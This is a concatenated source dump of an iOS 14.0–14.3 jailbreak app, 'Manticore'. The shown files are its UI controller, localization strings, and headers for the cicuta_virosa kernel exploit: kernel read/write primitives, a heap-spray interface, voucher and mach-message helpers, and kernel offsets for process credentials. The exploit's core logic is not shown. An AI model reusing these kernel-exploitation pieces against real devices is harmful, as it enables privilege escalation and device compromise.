176 | // pd = read_32(proc + koffset(KSTRUCT_OFFSET_PROC_PID));
177 | // if (pd == pid) return proc;
178 | // proc = read_64(proc);
179 | // }
180 | return 0;
181 | }
182 |
183 | kptr_t find_vnode_with_fd(kptr_t proc, int fd) {
184 | kptr_t ret = KPTR_NULL;
185 | if(fd <= 0 || !KERN_POINTER_VALID(proc)) return 1;
186 | kptr_t fdp = read_64(proc + 0xf8);
187 | if(!KERN_POINTER_VALID(fdp)) return 2;
188 | kptr_t ofp = read_64(fdp + 0x0);
189 | if(!KERN_POINTER_VALID(ofp)) return 3;
190 | kptr_t fpp = read_64(ofp + (fd * sizeof(kptr_t)));
191 | if(!KERN_POINTER_VALID(fpp)) return 4;
192 | kptr_t fgp = read_64(fpp + 0x10);
193 | if(!KERN_POINTER_VALID(fgp)) return 5;
194 | kptr_t vnode = read_64(fgp + 0x38);
195 | if(!KERN_POINTER_VALID(vnode)) return 6;
196 | ret = vnode;
197 | return ret;
198 | }
199 |
200 | kptr_t find_allproc(){
201 | kptr_t current_proc = g_exp.kernel_proc;
202 | while(true){
203 | kptr_t next_proc = kapi_read_kptr(current_proc + OFFSET(proc, le_next));
204 | if(KERN_POINTER_VALID(next_proc)) current_proc = next_proc;
205 | if(KERN_POINTER_INVALID(next_proc)) break;
206 | }
207 |
208 | return current_proc;
209 | }
210 |
--------------------------------------------------------------------------------
/manticore/ViewController.h:
--------------------------------------------------------------------------------
1 | //
2 | // ViewController.h
3 | // reton
4 | //
5 | // Created by Luca on 15.02.21.
6 | //
7 |
8 | #import
9 | char *Build_resource_path(char *filename);
10 | @interface ViewController : UIViewController
11 | @property (weak, nonatomic) IBOutlet UIButton *jailbreakButton;
12 | @property (weak, nonatomic) IBOutlet UIButton *optionsButton;
13 | @property (weak, nonatomic) IBOutlet UITextView *logWindow;
14 | - (IBAction)runJailbreak:(id)sender;
15 | - (IBAction)openOptions:(id)sender;
16 | - (IBAction)setApNonceBtn:(id)sender;
17 | - (void)sendMessageToLog:(NSString *)Message;
18 | bool checkDeviceCompatibility(void);
19 | @property (weak, nonatomic) IBOutlet UIProgressView *progressView;
20 | @property (weak, nonatomic) IBOutlet UILabel *compatibilityLabel;
21 |
22 | @end
23 |
24 |
--------------------------------------------------------------------------------
/manticore/ViewController.m:
--------------------------------------------------------------------------------
1 | //
2 | // ViewController.m
3 | // reton
4 | //
5 | // Created by GeoSn0w on 24.08.21.
6 | //
7 |
8 | #import "ViewController.h"
9 | #include // cicuta_virosa exploit [14.0 --> 14.3]
10 | #include
11 | #include
12 | #include
13 |
14 | #define SYSTEM_VERSION_EQUAL_TO(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedSame)
15 | #define SYSTEM_VERSION_GREATER_THAN(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedDescending)
16 | #define SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] != NSOrderedAscending)
17 | #define SYSTEM_VERSION_LESS_THAN(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedAscending)
18 | #define SYSTEM_VERSION_LESS_THAN_OR_EQUAL_TO(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] != NSOrderedDescending)
19 |
20 | NSString *APNonce = NULL;
21 |
22 | @interface ViewController ()
23 |
24 | @end
25 |
26 | @implementation ViewController
27 |
28 | bool checkDeviceCompatibility(){
29 | // proper range check so that iOS 14.7.1 wouldn't say it's compatible when we use cicuta_virosa
30 | if (SYSTEM_VERSION_LESS_THAN_OR_EQUAL_TO(@"14.3") && SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(@"14.0")){
31 | NSLog(@"[+] Found compatible device, continuing...");
32 | return true;
33 | } else {
34 | NSLog(@"[!] Incompatible device detected. Will not continue.");
35 | return false;
36 | }
37 | }
38 |
39 |
40 | char *Build_resource_path(char *filename){
41 | NSString *resourcePath = [[NSBundle mainBundle] resourcePath];
42 | if(filename == NULL) {
43 | return strdup([[resourcePath stringByAppendingString:@"/"] UTF8String]);
44 | }
45 | return strdup([[resourcePath stringByAppendingPathComponent:[NSString stringWithUTF8String:filename]] UTF8String]);
46 | }
47 |
48 | - (void)viewDidLoad {
49 | [super viewDidLoad];
50 | [_jailbreakButton.layer setBorderColor:[UIColor systemGray2Color].CGColor];
51 | NSString *programVersion = [[NSBundle mainBundle] objectForInfoDictionaryKey:@"CFBundleVersion"];
52 |
53 | handleExistingJailbreak(self);
54 |
55 | if (checkDeviceCompatibility()) {
56 | _compatibilityLabel.text = [NSString stringWithFormat:@"Your %@ on iOS %@ is compatible with manticore!", [[UIDevice currentDevice] model], [[UIDevice currentDevice] systemVersion]];
57 | } else {
58 | _compatibilityLabel.text = [NSString stringWithFormat:@"Your %@ on iOS %@ is NOT compatible with Manticore.", [[UIDevice currentDevice] model], [[UIDevice currentDevice] systemVersion]];
59 | self.jailbreakButton.enabled = NO;
60 | [_jailbreakButton setTitle:@"Incompatible" forState:UIControlStateDisabled];
61 | }
62 |
63 | [self sendMessageToLog:[NSString stringWithFormat:@"Press 'Jailbreak Me' to start (Manticore %@)", programVersion]];
64 |
65 | [self sendMessageToLog:[NSString stringWithFormat:@"@RPwnage && PwnedC99"]];
66 |
67 | // Do any additional setup after loading the view.
68 | }
69 |
70 | - (IBAction)done:(UIStoryboardSegue *)segue {
71 | }
72 |
73 | - (IBAction)runJailbreak:(id)sender {
74 | [self sendMessageToLog:@"[*] Starting...."];
75 |
76 | self.logWindow.text = @"";
77 | self.jailbreakButton.enabled = NO;
78 |
79 | dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_DEFAULT, 0), ^{
80 | dispatch_sync( dispatch_get_main_queue(), ^{
81 | exploit_main();
82 | });
83 | });
84 | }
85 |
86 | - (void)sendMessageToLog:(NSString *)Message {
87 | [self.logWindow insertText:[NSString stringWithFormat:@"%@\n", Message]];
88 | }
89 |
90 | char *anotherJailbreakMessage;
91 | void handleExistingJailbreak(id selfless) {
92 | NSString *jailbreakName = anotherJailbreakMessage ? [NSString stringWithUTF8String: anotherJailbreakMessage]: nil;
93 | NSString *messageForUser = [NSString stringWithFormat:@"%s/%@/%@", "We've detected you have ", jailbreakName, @"already installed. Please uninstall it first, and restore ROOT FS before jailbreaking with Manticore to prevent any compatibility issues."];
94 |
95 | UIAlertController *existingJailbreakAlert = [UIAlertController alertControllerWithTitle:@"Critical Error" message:messageForUser preferredStyle:UIAlertControllerStyleAlert];
96 |
97 | [selfless presentViewController:existingJailbreakAlert animated:YES completion:nil];
98 | }
99 |
100 | - (IBAction)openOptions:(id)sender {
101 |
102 | }
103 |
104 | @end
105 |
--------------------------------------------------------------------------------
/manticore/de.lproj/LaunchScreen.strings:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/manticore/de.lproj/Main.strings:
--------------------------------------------------------------------------------
1 |
2 | /* Class = "UILabel"; text = "Set APNonce"; ObjectID = "0yi-4F-L8u"; */
3 | "0yi-4F-L8u.text" = "APNonce Setzen";
4 |
5 | /* Class = "UILabel"; text = "Enable Tweaks"; ObjectID = "2Nf-dY-FJy"; */
6 | "2Nf-dY-FJy.text" = "Tweaks Erlauben";
7 |
8 | /* Class = "UILabel"; text = "Disable Screen Time"; ObjectID = "8Oy-13-2xy"; */
9 | "8Oy-13-2xy.text" = "Bildschirmzeit Deaktivieren";
10 |
11 | /* Class = "UILabel"; text = "Package Management"; ObjectID = "8lS-uL-LxK"; */
12 | "8lS-uL-LxK.text" = "Package Management";
13 |
14 | /* Class = "UILabel"; text = "Restore RootFS"; ObjectID = "AVZ-qX-0ms"; */
15 | "AVZ-qX-0ms.text" = "RootFS Wiederherstellen";
16 |
17 | /* Class = "UIButton"; normalTitle = "Jailbreak"; ObjectID = "B09-wX-UeI"; */
18 | "B09-wX-UeI.normalTitle" = "Jailbreak";
19 |
20 | /* Class = "UILabel"; text = "Show Log Window"; ObjectID = "GyA-VR-ZRI"; */
21 | "GyA-VR-ZRI.text" = "Log Window Zeigen";
22 |
23 | /* Class = "UITextField"; placeholder = "0x1111111111111111"; ObjectID = "JaD-0s-nbo"; */
24 | "JaD-0s-nbo.placeholder" = "0x1111111111111111";
25 |
26 | /* Class = "UILabel"; text = "Disable Updates"; ObjectID = "K4g-i5-DXs"; */
27 | "K4g-i5-DXs.text" = "Updates Blockieren";
28 |
29 | /* Class = "UILabel"; text = "Settings"; ObjectID = "KVP-vA-4W2"; */
30 | "KVP-vA-4W2.text" = "Einstellungen";
31 |
32 | /* Class = "UIButton"; normalTitle = "Save & Set APNonce"; ObjectID = "WEh-zy-xS5"; */
33 | "WEh-zy-xS5.normalTitle" = "APNonce Speichern & Setzen";
34 |
35 | /* Class = "UILabel"; text = "Restore RootFS"; ObjectID = "bFz-pN-VmJ"; */
36 | "bFz-pN-VmJ.text" = "RootFS Wiederherstellen";
37 |
38 | /* Class = "UIButton"; normalTitle = "Options"; ObjectID = "czz-vo-cHF"; */
39 | "czz-vo-cHF.normalTitle" = "Einstellungen";
40 |
41 | /* Class = "UILabel"; text = "Block OTA Updates"; ObjectID = "efL-nQ-xsh"; */
42 | "efL-nQ-xsh.text" = "OTA Updates Blockieren";
43 |
44 | /* Class = "UILabel"; text = "Max Memory Limit"; ObjectID = "hav-yD-P83"; */
45 | "hav-yD-P83.text" = "Max Memory Limit";
46 |
47 | /* Class = "UILabel"; text = "Compatibility"; ObjectID = "i1H-yX-3n8"; */
48 | "i1H-yX-3n8.text" = "Kompatibilität";
49 |
50 | /* Class = "UILabel"; text = "Load Daemons"; ObjectID = "kFD-2g-aOl"; */
51 | "kFD-2g-aOl.text" = "Daemons Laden";
52 |
53 | /* Class = "UILabel"; text = "Remove ScreenTime"; ObjectID = "kyq-MK-M3C"; */
54 | "kyq-MK-M3C.text" = "Bildschirmzeit Deaktivieren";
55 |
56 | /* Class = "UILabel"; text = "Manticore"; ObjectID = "mUJ-nK-XHv"; */
57 | "mUJ-nK-XHv.text" = "Manticore";
58 |
59 | /* Class = "UILabel"; text = "Load Tweaks"; ObjectID = "ntj-8w-lbe"; */
60 | "ntj-8w-lbe.text" = "Tweaks Laden";
61 |
62 | /* Class = "UILabel"; text = "Your iPhone 11 Pro on iOS 14.3 is compatible with Manticore!"; ObjectID = "o5h-H3-igh"; */
63 | "o5h-H3-igh.text" = "Your iPhone 11 Pro on iOS 14.3 is compatible with Manticore!";
64 |
65 | /* Class = "UITextView"; text = "Lorem ipsum dolor sit er elit lamet, consectetaur cillium adipisicing pecu, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Nam liber te conscient to factor tum poen legum odioque civiuda."; ObjectID = "oZg-Pf-ew7"; */
66 | "oZg-Pf-ew7.text" = "Lorem ipsum dolor sit er elit lamet, consectetaur cillium adipisicing pecu, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Nam liber te conscient to factor tum poen legum odioque civiuda.";
67 |
68 | /* Class = "UILabel"; text = "Log ECID"; ObjectID = "voS-Ev-D3K"; */
69 | "voS-Ev-D3K.text" = "Log ECID";
70 |
71 | /* Class = "UILabel"; text = "iOS 14.0 - 14.3"; ObjectID = "xtR-ck-MtY"; */
72 | "xtR-ck-MtY.text" = "iOS 14.0 - 14.3";
73 |
74 | /* Class = "UILabel"; text = "Toggle Log Window"; ObjectID = "yiE-wg-tPU"; */
75 | "yiE-wg-tPU.text" = "Toggle Log Window";
76 |
--------------------------------------------------------------------------------
/manticore/include/exploit/cicuta/cicuta_log.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 |
4 | void cicuta_log(const char* format, ...) __printflike(1, 2);
5 |
--------------------------------------------------------------------------------
/manticore/include/exploit/cicuta/cicuta_virosa.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 |
4 | #define kCFCoreFoundationVersionNumber_iOS_14_0 1740.00
5 |
6 | #ifdef __cplusplus
7 | extern "C" {
8 | #endif
9 |
10 | extern pthread_t* redeem_racers;
11 | void cicuta_virosa(void);
12 | uint64_t read_64(uint64_t addr);
13 | uint32_t read_32(uint64_t addr);
14 | void read_20(uint64_t addr, void *buf);
15 | void write_20(uint64_t addr, const void* buf);
16 | void write_32(uint64_t addr, const void* buf);
17 | void write_32bits(uint64_t addr, const void* buf);
18 | void write_64(uint64_t addr, const void* buf);
19 | extern uint64_t task_port_pwnd;
20 | void build_stage0_kmem_api(void);
21 |
22 | #ifdef __cplusplus
23 | }
24 | #endif
25 |
--------------------------------------------------------------------------------
/manticore/include/exploit/cicuta/descriptors_utils.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 |
4 | void increase_limits(uint32_t limit);
5 |
--------------------------------------------------------------------------------
/manticore/include/exploit/cicuta/exploit_main.h:
--------------------------------------------------------------------------------
1 | //
2 | // exploit_main.h
3 | // manticore
4 | //
5 | // Created by Luca on 25.02.21.
6 | //
7 |
8 | #ifndef exploit_main_h
9 | #define exploit_main_h
10 |
11 | #include
12 |
13 | typedef uint64_t kptr_t;
14 |
15 | uint32_t iosurface_create_fast(void);
16 | static int *pipefds;
17 | static size_t pipe_buffer_size = 0x1000;
18 | static uint8_t *pipe_buffer;
19 | static kptr_t IOSurfaceRoot_uc;
20 | void exploit_main(void);
21 |
22 | #endif /* exploit_main_h */
23 |
--------------------------------------------------------------------------------
/manticore/include/exploit/cicuta/exploit_utilities.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 |
4 | struct ool_msg {
5 | mach_msg_header_t hdr;
6 | mach_msg_body_t body;
7 | mach_msg_ool_ports_descriptor_t ool_ports;
8 | };
9 |
10 | struct simple_msg {
11 | mach_msg_header_t hdr;
12 | char buf[0];
13 | };
14 |
15 | typedef struct {
16 | mach_msg_bits_t msgh_bits;
17 | mach_msg_size_t msgh_size;
18 | uint64_t msgh_remote_port;
19 | uint64_t msgh_local_port;
20 | mach_port_name_t msgh_voucher_port;
21 | mach_msg_id_t msgh_id;
22 | } kern_mach_msg_header_t;
23 |
24 | // mach_msg related utils
25 | #ifdef __cplusplus
26 | extern "C" {
27 | #endif
28 |
29 | mach_port_t cv_new_mach_port(void);
30 | mach_port_t new_mach_port(void);
31 | kern_return_t send_message(mach_port_t destination, void *buffer, mach_msg_size_t size);
32 | struct simple_msg* receive_message(mach_port_t source, mach_msg_size_t size);
33 | int send_ool_ports(mach_port_t where, mach_port_t target_port, int count, int disposition);
34 | int cv_send_ool_ports(mach_port_t where, mach_port_t target_port, int count, int disposition);
35 |
36 | #ifdef __cplusplus
37 | }
38 | #endif
39 |
--------------------------------------------------------------------------------
/manticore/include/exploit/cicuta/fake_element_spray.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 |
9 | #define FAKE_ELEMENT_MAGIC_BASE 0x4242424200000000
10 | #define IPV6_USE_MIN_MTU 42
11 | #define IPV6_PKTINFO 46
12 |
13 | void init_fake_element_spray(uint32_t e_size, uint32_t count);
14 | void fake_element_spray_set_e_size(uint32_t e_size);
15 | void fake_element_spray_set_pktopts(uint64_t pktopts);
16 | void perform_fake_element_spray(void);
17 | void release_all_fake_element_spray(void);
18 | void release_fake_element_spray_at(uint32_t index);
19 | void shutdown_fake_element_spray(void);
20 | void set_fake_queue_chain_for_fake_element_spray(uint64_t next, uint64_t prev);
21 |
--------------------------------------------------------------------------------
/manticore/include/exploit/cicuta/voucher_utils.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #define USER_DATA_ELEMENT_SIZEOF 32
4 | #define DATA_VOUCHER_CONTENT_SIZE (168 - USER_DATA_ELEMENT_SIZEOF)
5 |
6 | kern_return_t create_voucher(mach_voucher_attr_recipe_t recipe, ipc_voucher_t* voucher);
7 | kern_return_t create_user_data_voucher_fast(uint64_t id, ipc_voucher_t* voucher);
8 | mach_voucher_attr_recipe_data_t* create_recipe_for_user_data_voucher(uint64_t id);
9 | kern_return_t destroy_voucher(ipc_voucher_t voucher);
10 |
--------------------------------------------------------------------------------
/manticore/include/lib/snappy/IOKit.h:
--------------------------------------------------------------------------------
1 | // fuck iokit
2 |
3 | #ifndef IOKIT_H
4 | #define IOKIT_H
5 |
6 | #include
7 | #include
8 | #include
9 |
10 | typedef char io_name_t[128];
11 | typedef char io_string_t[512];
12 | typedef char io_struct_inband_t[4096];
13 | typedef mach_port_t io_object_t;
14 | typedef io_object_t io_registry_entry_t;
15 | typedef io_object_t io_service_t;
16 | typedef io_object_t io_connect_t;
17 | typedef io_object_t io_iterator_t;
18 |
19 | #ifndef IO_OBJECT_NULL
20 | #define IO_OBJECT_NULL (0)
21 | #endif
22 |
23 | #define kBootNoncePropertyKey "com.apple.System.boot-nonce"
24 | #define kIONVRAMDeletePropertyKey "IONVRAM-DELETE-PROPERTY"
25 | #define kIONVRAMForceSyncNowPropertyKey "IONVRAM-FORCESYNCNOW-PROPERTY"
26 |
27 | #define IO_BITS_PORT_INFO 0x0000f000
28 | #define IO_BITS_KOTYPE 0x00000fff
29 | #define IO_BITS_OTYPE 0x7fff0000
30 | #define IO_BITS_ACTIVE 0x80000000
31 |
32 | #define IKOT_NONE 0
33 | #define IKOT_THREAD 1
34 | #define IKOT_TASK 2
35 | #define IKOT_HOST 3
36 | #define IKOT_HOST_PRIV 4
37 | #define IKOT_PROCESSOR 5
38 | #define IKOT_PSET 6
39 | #define IKOT_PSET_NAME 7
40 | #define IKOT_TIMER 8
41 | #define IKOT_PAGING_REQUEST 9
42 | #define IKOT_MIG 10
43 | #define IKOT_MEMORY_OBJECT 11
44 | #define IKOT_XMM_PAGER 12
45 | #define IKOT_XMM_KERNEL 13
46 | #define IKOT_XMM_REPLY 14
47 | #define IKOT_UND_REPLY 15
48 | #define IKOT_HOST_NOTIFY 16
49 | #define IKOT_HOST_SECURITY 17
50 | #define IKOT_LEDGER 18
51 | #define IKOT_MASTER_DEVICE 19
52 | #define IKOT_TASK_NAME 20
53 | #define IKOT_SUBSYSTEM 21
54 | #define IKOT_IO_DONE_QUEUE 22
55 | #define IKOT_SEMAPHORE 23
56 | #define IKOT_LOCK_SET 24
57 | #define IKOT_CLOCK 25
58 | #define IKOT_CLOCK_CTRL 26
59 | #define IKOT_IOKIT_SPARE 27
60 | #define IKOT_NAMED_ENTRY 28
61 | #define IKOT_IOKIT_CONNECT 29
62 | #define IKOT_IOKIT_OBJECT 30
63 | #define IKOT_UPL 31
64 | #define IKOT_MEM_OBJ_CONTROL 32
65 | #define IKOT_AU_SESSIONPORT 33
66 | #define IKOT_FILEPORT 34
67 | #define IKOT_LABELH 35
68 | #define IKOT_TASK_RESUME 36
69 |
70 | enum
71 | {
72 | kIOCFSerializeToBinary = 0x00000001U,
73 | };
74 |
75 | enum
76 | {
77 | kOSSerializeDictionary = 0x01000000U,
78 | kOSSerializeArray = 0x02000000U,
79 | kOSSerializeSet = 0x03000000U,
80 | kOSSerializeNumber = 0x04000000U,
81 | kOSSerializeSymbol = 0x08000000U,
82 | kOSSerializeString = 0x09000000U,
83 | kOSSerializeData = 0x0a000000U,
84 | kOSSerializeBoolean = 0x0b000000U,
85 | kOSSerializeObject = 0x0c000000U,
86 |
87 | kOSSerializeTypeMask = 0x7F000000U,
88 | kOSSerializeDataMask = 0x00FFFFFFU,
89 |
90 | kOSSerializeEndCollection = 0x80000000U,
91 |
92 | kOSSerializeMagic = 0x000000d3U,
93 | };
94 |
95 | #define kOSSerializeBinarySignature 0x000000D3U
96 |
97 | extern const mach_port_t kIOMasterPortDefault;
98 |
99 | CF_RETURNS_RETAINED CFDataRef IOCFSerialize(CFTypeRef object, CFOptionFlags options);
100 | CFTypeRef IOCFUnserializeWithSize(const char *buf, size_t len, CFAllocatorRef allocator, CFOptionFlags options, CFStringRef *err);
101 |
102 | kern_return_t IOObjectRetain(io_object_t object);
103 | kern_return_t IOObjectRelease(io_object_t object);
104 | boolean_t IOObjectConformsTo(io_object_t object, const io_name_t name);
105 | uint32_t IOObjectGetKernelRetainCount(io_object_t object);
106 | kern_return_t IOObjectGetClass(io_object_t object, io_name_t name);
107 | CFStringRef IOObjectCopyClass(io_object_t object);
108 | CFStringRef IOObjectCopySuperclassForClass(CFStringRef name);
109 | CFStringRef IOObjectCopyBundleIdentifierForClass(CFStringRef name);
110 |
111 | io_registry_entry_t IORegistryGetRootEntry(mach_port_t master);
112 | kern_return_t IORegistryEntryGetName(io_registry_entry_t entry, io_name_t name);
113 | kern_return_t IORegistryEntryGetRegistryEntryID(io_registry_entry_t entry, uint64_t *entryID);
114 | kern_return_t IORegistryEntryGetPath(io_registry_entry_t entry, const io_name_t plane, io_string_t path);
115 | kern_return_t IORegistryEntryGetProperty(io_registry_entry_t entry, const io_name_t name, io_struct_inband_t buffer, uint32_t *size);
116 | kern_return_t IORegistryEntryCreateCFProperties(io_registry_entry_t entry, CFMutableDictionaryRef *properties, CFAllocatorRef allocator, uint32_t options);
117 | CFTypeRef IORegistryEntryCreateCFProperty(io_registry_entry_t entry, CFStringRef key, CFAllocatorRef allocator, uint32_t options);
118 | kern_return_t IORegistryEntrySetCFProperties(io_registry_entry_t entry, CFTypeRef properties);
119 |
120 | kern_return_t IORegistryCreateIterator(mach_port_t master, const io_name_t plane, uint32_t options, io_iterator_t *it);
121 | kern_return_t IORegistryEntryCreateIterator(io_registry_entry_t entry, const io_name_t plane, uint32_t options, io_iterator_t *it);
122 | kern_return_t IORegistryEntryGetChildIterator(io_registry_entry_t entry, const io_name_t plane, io_iterator_t *it);
123 | kern_return_t IORegistryEntryGetParentIterator(io_registry_entry_t entry, const io_name_t plane, io_iterator_t *it);
124 | io_object_t IOIteratorNext(io_iterator_t it);
125 | boolean_t IOIteratorIsValid(io_iterator_t it);
126 | void IOIteratorReset(io_iterator_t it);
127 |
128 | CFMutableDictionaryRef IOServiceMatching(const char *name) CF_RETURNS_RETAINED;
129 | CFMutableDictionaryRef IOServiceNameMatching(const char *name) CF_RETURNS_RETAINED;
130 | io_service_t IOServiceGetMatchingService(mach_port_t master, CFDictionaryRef matching CF_RELEASES_ARGUMENT);
131 | kern_return_t IOServiceGetMatchingServices(mach_port_t master, CFDictionaryRef matching CF_RELEASES_ARGUMENT, io_iterator_t *it);
132 | kern_return_t _IOServiceGetAuthorizationID(io_service_t service, uint64_t *authID);
133 | kern_return_t _IOServiceSetAuthorizationID(io_service_t service, uint64_t authID);
134 | kern_return_t IOServiceOpen(io_service_t service, task_t task, uint32_t type, io_connect_t *client);
135 | kern_return_t IOServiceClose(io_connect_t client);
136 | kern_return_t IOCloseConnection(io_connect_t client);
137 | kern_return_t IOConnectAddRef(io_connect_t client);
138 | kern_return_t IOConnectRelease(io_connect_t client);
139 | kern_return_t IOConnectGetService(io_connect_t client, io_service_t *service);
140 | kern_return_t IOConnectAddClient(io_connect_t client, io_connect_t other);
141 | kern_return_t IOConnectSetNotificationPort(io_connect_t client, uint32_t type, mach_port_t port, uintptr_t ref);
142 | kern_return_t IOConnectMapMemory64(io_connect_t client, uint32_t type, task_t task, mach_vm_address_t *addr, mach_vm_size_t *size, uint32_t options);
143 | kern_return_t IOConnectUnmapMemory64(io_connect_t client, uint32_t type, task_t task, mach_vm_address_t addr);
144 | kern_return_t IOConnectSetCFProperties(io_connect_t client, CFTypeRef properties);
145 | kern_return_t IOConnectCallMethod(io_connect_t client, uint32_t selector, const uint64_t *in, uint32_t inCnt, const void *inStruct, size_t inStructCnt, uint64_t *out, uint32_t *outCnt, void *outStruct, size_t *outStructCnt);
146 | kern_return_t IOConnectCallScalarMethod(io_connect_t client, uint32_t selector, const uint64_t *in, uint32_t inCnt, uint64_t *out, uint32_t *outCnt);
147 | kern_return_t IOConnectCallStructMethod(io_connect_t client, uint32_t selector, const void *inStruct, size_t inStructCnt, void *outStruct, size_t *outStructCnt);
148 | kern_return_t IOConnectCallAsyncMethod(io_connect_t client, uint32_t selector, mach_port_t wake_port, uint64_t *ref, uint32_t refCnt, const uint64_t *in, uint32_t inCnt, const void *inStruct, size_t inStructCnt, uint64_t *out, uint32_t *outCnt, void *outStruct, size_t *outStructCnt);
149 | kern_return_t IOConnectCallAsyncScalarMethod(io_connect_t client, uint32_t selector, mach_port_t wake_port, uint64_t *ref, uint32_t refCnt, const uint64_t *in, uint32_t inCnt, uint64_t *out, uint32_t *outCnt);
150 | kern_return_t IOConnectCallAsyncStructMethod(io_connect_t client, uint32_t selector, mach_port_t wake_port, uint64_t *ref, uint32_t refCnt, const void *inStruct, size_t inStructCnt, void *outStruct, size_t *outStructCnt);
151 | kern_return_t IOConnectTrap6(io_connect_t client, uint32_t index, uintptr_t a, uintptr_t b, uintptr_t c, uintptr_t d, uintptr_t e, uintptr_t f);
152 | io_registry_entry_t IORegistryEntryFromPath(mach_port_t masterPort, const io_string_t path);
153 |
154 | #endif
155 |
--------------------------------------------------------------------------------
/manticore/include/lib/snappy/snappy.h:
--------------------------------------------------------------------------------
1 | /* Copyright 2018 Sam Bingner All Rights Reserved
2 | */
3 |
4 | #ifndef _SNAPPY_H
5 | #define _SNAPPY_H
6 |
7 | #ifdef __cplusplus
8 | extern "C" {
9 | #endif
10 |
11 | const char **snapshot_list(int dirfd);
12 | bool snapshot_check(int dirfd, const char *name);
13 | char *copySystemSnapshot(void);
14 |
15 | #ifdef __cplusplus
16 | }
17 | #endif
18 |
19 | #endif
20 |
--------------------------------------------------------------------------------
/manticore/include/lib/tq/iosurface.h:
--------------------------------------------------------------------------------
1 | //
2 | // IOSurfaceLib.h
3 | // manticore
4 | //
5 | // Created by Luca on 25.02.21.
6 | //
7 |
8 | #ifndef IOSurfaceLib_h
9 | #define IOSurfaceLib_h
10 |
11 | #include
12 | #include
13 | #include
14 |
15 | extern mach_port_t IOSurfaceRootUserClient;
16 |
17 | #endif /* IOSurfaceLib_h */
18 |
--------------------------------------------------------------------------------
/manticore/include/lib/tq/k_offsets.h:
--------------------------------------------------------------------------------
1 | //
2 | // k_offsets.h
3 | // ios-fuzzer
4 | //
5 | // Created by Quote on 2021/1/26.
6 | // Copyright © 2021 Quote. All rights reserved.
7 | //
8 |
9 | #ifndef k_offsets_h
10 | #define k_offsets_h
11 |
12 | // Generate the name for an offset.
13 | #define OFFSET(base_, object_) _##base_##__##object_##__offset_
14 |
15 | // Generate the name for the size of an object.
16 | #define SIZE(object_) _##object_##__size_
17 | typedef uint64_t kptr_t;
18 | #ifdef Q_INTERNAL
19 | #define qexternal
20 | #else
21 | #define qexternal extern
22 | #endif
23 |
24 | // Parameters for ipc_entry.
25 | qexternal size_t SIZE(ipc_entry);
26 | qexternal size_t OFFSET(ipc_entry, ie_object);
27 |
28 | // Parameters for ipc_port.
29 | qexternal size_t OFFSET(ipc_port, ip_bits);
30 | qexternal size_t OFFSET(ipc_port, ip_references);
31 | qexternal size_t OFFSET(ipc_port, ip_kobject);
32 |
33 | // Parameters for struct ipc_space.
34 | qexternal size_t OFFSET(ipc_space, is_table_size);
35 | qexternal size_t OFFSET(ipc_space, is_table);
36 | qexternal size_t OFFSET(thread, jop_pid); // struct thread { struct machine_thread { jop_pid } }
37 |
38 | // Parameters for struct task.
39 | qexternal size_t OFFSET(task, map);
40 | qexternal size_t OFFSET(task, itk_space);
41 | qexternal size_t OFFSET(task, bsd_info);
42 | qexternal size_t OFFSET(task, t_flags);
43 |
44 | // Parameters for proc
45 | qexternal size_t OFFSET(proc, le_next);
46 | qexternal size_t OFFSET(proc, le_prev);
47 | qexternal size_t OFFSET(proc, task);
48 | qexternal size_t OFFSET(proc, p_ucred);
49 | qexternal size_t OFFSET(proc, p_pid);
50 | qexternal size_t OFFSET(proc, p_fd);
51 | qexternal size_t OFFSET(proc, csflags);
52 | qexternal size_t OFFSET(proc, gid);
53 | qexternal size_t OFFSET(proc, rgid);
54 | qexternal size_t OFFSET(proc, uid);
55 | qexternal size_t OFFSET(proc, ruid);
56 | qexternal size_t OFFSET(proc, pid);
57 |
58 | qexternal size_t OFFSET(filedesc, fd_ofiles);
59 | qexternal size_t OFFSET(fileproc, fp_glob);
60 | qexternal size_t OFFSET(fileglob, fg_data);
61 | qexternal size_t OFFSET(pipe, buffer);
62 |
63 | // Parameters for ucred
64 | qexternal size_t OFFSET(ucred, cr_posix);
65 | qexternal size_t OFFSET(ucred, cr_uid);
66 | qexternal size_t OFFSET(ucred, cr_svuid);
67 | qexternal size_t OFFSET(ucred, cr_ngroups);
68 | qexternal size_t OFFSET(ucred, cr_groups);
69 | qexternal size_t OFFSET(ucred, cr_svgid);
70 | qexternal size_t OFFSET(ucred, cr_rgid);
71 | qexternal size_t OFFSET(ucred, cr_label);
72 |
73 | qexternal size_t SIZE(posix_cred);
74 |
75 | // Parameters for OSDictionary.
76 | qexternal size_t OFFSET(OSDictionary, count);
77 | qexternal size_t OFFSET(OSDictionary, capacity);
78 | qexternal size_t OFFSET(OSDictionary, dictionary);
79 |
80 | // Parameters for OSString.
81 | qexternal size_t OFFSET(OSString, string);
82 |
83 | // Parameters for IOSurfaceRootUserClient.
